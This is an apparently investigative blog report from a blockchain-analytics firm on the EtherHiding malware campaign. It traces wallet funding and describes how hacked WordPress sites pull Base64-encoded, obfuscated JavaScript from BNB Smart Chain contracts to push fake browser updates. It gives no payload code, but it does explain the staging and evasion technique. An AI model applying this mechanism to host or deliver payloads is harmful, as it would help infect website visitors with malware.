October 18, 2023

Following the Money on EtherHiding Hacks

The recent upswing in hacking incidents on Web3 projects has alerted industry participants to protect themselves against any possible vulnerabilities in their systems. At the same time, hackers have started coming up with novel ways to attack Web3 users through methods that are difficult to investigate and stop.

One such recent method is called EtherHiding, a practice through which hackers use compromising WordPress websites to prompt unsuspecting victims to download fake browser updates that contain malware, exposing their data in the process.

In an EtherHiding attack, malware embedded on affected WordPress sites would retrieve partial payloads, or malicious codes, from contracts on BNB Smart Chain. As a result, the blockchain effectively serves as a free hosting platform for autonomously operating payloads. This allows EtherHiding hackers to frequently change their codes for multiple attack possibilities, including fake prompts to update browsers. Specifically, these changes are implemented with each new blockchain transaction on BNB Smart Chain.

EtherHiding, which was revealed in an article by security firm Guardio Labs and subsequently reported by Cointelegraph, is one example of the many, increasingly sophisticated methods through which hackers attempt to get user data through malware hidden in seemingly legitimate prompts to update web browsers. This method exploits the lax security measures on WordPress websites and a new use case for BNB Smart Chain: as an unwitting, reliable, and unblockable payload host compared to Web2 hosting solutions.

In this report, the 0xScope team has discovered more details about how EtherHiding hackers operate, including their methods of implementing malicious code and, more crucially, financing their deployment of payloads on BNB Smart Chain contracts.

EtherHiding Money Trail

Click here to zoom in.

Using Scopescan's Money Flow feature, the 0xScope team was able to spot connections between addresses that are involved in EtherHiding attacks.

On the BNB Smart Chain side, we observed that 0xfc1f, a contract deployer address for EtherHiding and an OpenSea user, received 0.0295488 $BNB in gas funds from fellow OpenSea user 0x3e31 on June 29, 2022. The next day, 0xfc1f sent 0.5 BNB to 0xa136, an address that had a history of multiple transactions with 0x3e31.

Other addresses connected to 0x3e31 are 0x688c, which sent 0.03 $BNB in gas funds on June 1, 2022, and 0x8fcb, which sent 69 $BNB to 0x688c on May 10, 2022.

Fast forward to September 5, 2023, EtherHiding contract deployer address 0xfc1f created an EtherHiding contract 0x7f36. This establishes the funding connections between the wallets we mentioned above and the EtherHiding attacks. However, little else is known about the identities of the entities using these wallets, aside from the fact that 0xfc1f and 0x3e31 are OpenSea users.

The 0xScope team then continued its investigation into EtherHiding, this time on the Ethereum blockchain. On June 29, 2022, the same day that 0xfc1f received BNB gas funds, this EtherHolding contract deployer address also received 0.45 $ETH in gas funds from 0xcBAa, which previously received 0.125 $ETH from 0x423f. The deployer address then had eight transactions with 0x9eba, establishing a relation between the two addresses at a 90% certainty level, according to Scopescan data.

0x9eba also deposited 2.48 $USDT to the deposit address (0xd336) of institutional crypto asset custody service Copper on October 20, 2022. On the same day, 0xB7a2 sent 0.0058 $ETH in gas fees to 0xd336. The 0xScope team thinks that this connection to Copper should provide a lead into any further investigation into EtherHiding hacks.

Aside from the EtherHiding money flows established across two blockchains, the 0xScope team also noticed multiple transactions between 0x3e31 and 0xa136 on the BNB Smart Chain side and between 0xfc1f and 0x9eba on the Ethereum side. There's a reasonable likelihood that these multiple transactions are tied to instances when EtherHiding hackers have updated the malicious codes on BNB Smart Chain.

Insights into EtherHiding Operations

In addition to following the money on EtherHiding, the 0xScope team also looked into further details on the hackers' codes. For instance, in the Guardio Labs report, its researchers found that the function "get()" in EtherHiding's BNB Smart Chain contract can be used to fetch the hackers' payload. Upon further investigation, we found that the function "link()" can also do the same fetching function. Our findings can be easily verified by decompiling the bycode of the smart contract or sending a transaction in a debugging framework like Foundry.

We also found the following insights into EtherHiding's actions, which can be broken down into three stages:

Stage 1

During the first time that the hacker updated the contract, the payload contained just the "test" plain text. It is likely that the hackers haven't done tests on any testnet, making it more difficult for investigators to observe the evolution of the codes used at this stage.

Stage 2

At this stage, the hacker encoded the payload using Base64. After decoding this, we observed that the malicious codes are written in Javascript. These codes continued to request the next payload from Web2 domains, 18 of which we have identified as EtherMining's sites, giving the hackers several options to change their attacks on a daily basis, sometimes even twice a day.

Here's a quick breakdown of how the malicious domains are being used:

1. A hacked website contains malicious codes (script) linked to the payload on the BNB Smart Chain.

2. The website's script then decrypts the payload from the blockchain.

3. The script then executes the payload from BNB Smart Chain and downloads the final payload from one of the hacker's hosting websites.

Stage 3

The payload contents from the BNB Smart Chain contract are first obfuscated through tools like Obfuscator.io and then encoded in Base64. By making the codes obscure, the hackers are able to implement their attacks while adding a layer of protection from being detected. Add this to the fact that the partial payloads on BNB Smart Chain are being updated daily, and we see how the attacks become sophisticated.

To understand how this obfuscation works, let's take a brief look at how pop-up messages can be launched on Internet browsers. A normal Javascript, alert('1') in this example, can prompt the display of a pop-up message like this one below. All you need to do is to open a website, press F12, select the Console tab, and enter alert('1').

With an obfuscator tool, the simple alert('1') code can be hidden in lines of code that make little sense at first glance, similar to the code below.

Combine that with the processes undertaken in the previous stages, and you have a system in which pop-up messages, some looking like legitimate prompts, bait unsuspecting Internet users to download a fake browser update that contains malware.

Here's a step-by-step process of how we uncovered more details about the EtherHiding scheme:

- Every day, EtherHiding updates its payload on its BNB Smart Chain contract. In one instance, on September 20, the hackers updated the codes twice.

- Looking into one of these updates, we see how the payloads are being changed with the help of blockchain transactions. Here's a screenshot of the raw data of a transaction that updates the payload.

- Decoding this transaction data reveals this string that was encoded on Base64.

- Decoding this string reveals the action being implemented by the obfuscated code. You can see in the decoded text at the bottom part of this image below that the code was intended to show a pop-up that will lead users to one of the compromised URLs, completing the malware distribution process.


Given the information revealed in this report, the 0xScope team recommends the following action points:

- BNB Smart Chain, and other blockchains for that matter, would benefit from implementing security measures that can prevent or mitigate this type of cybercrime. By exploring how smart contracts can interact with functions outside of Web3, blockchain developers can identify more points of vulnerability and patch them up.

- The 0xScope's money flow probe discovered that the hackers likely interacted with Copper addresses. This point of contact is a lead that can be pursued if anyone is interested in taking down the EtherHiding scheme.

- This report also highlights the value of Web3 money flow tools like Scopescan in detecting the connections between the addresses that hackers are likely associated with. Scopescan's tools give investigators an added advantage in detecting and stopping hackers in their tracks.

Sign up for Scopescan today

Visit 0xScope

0xScope | Scopescan | Link3 | X | Telegram | Youtube | Discord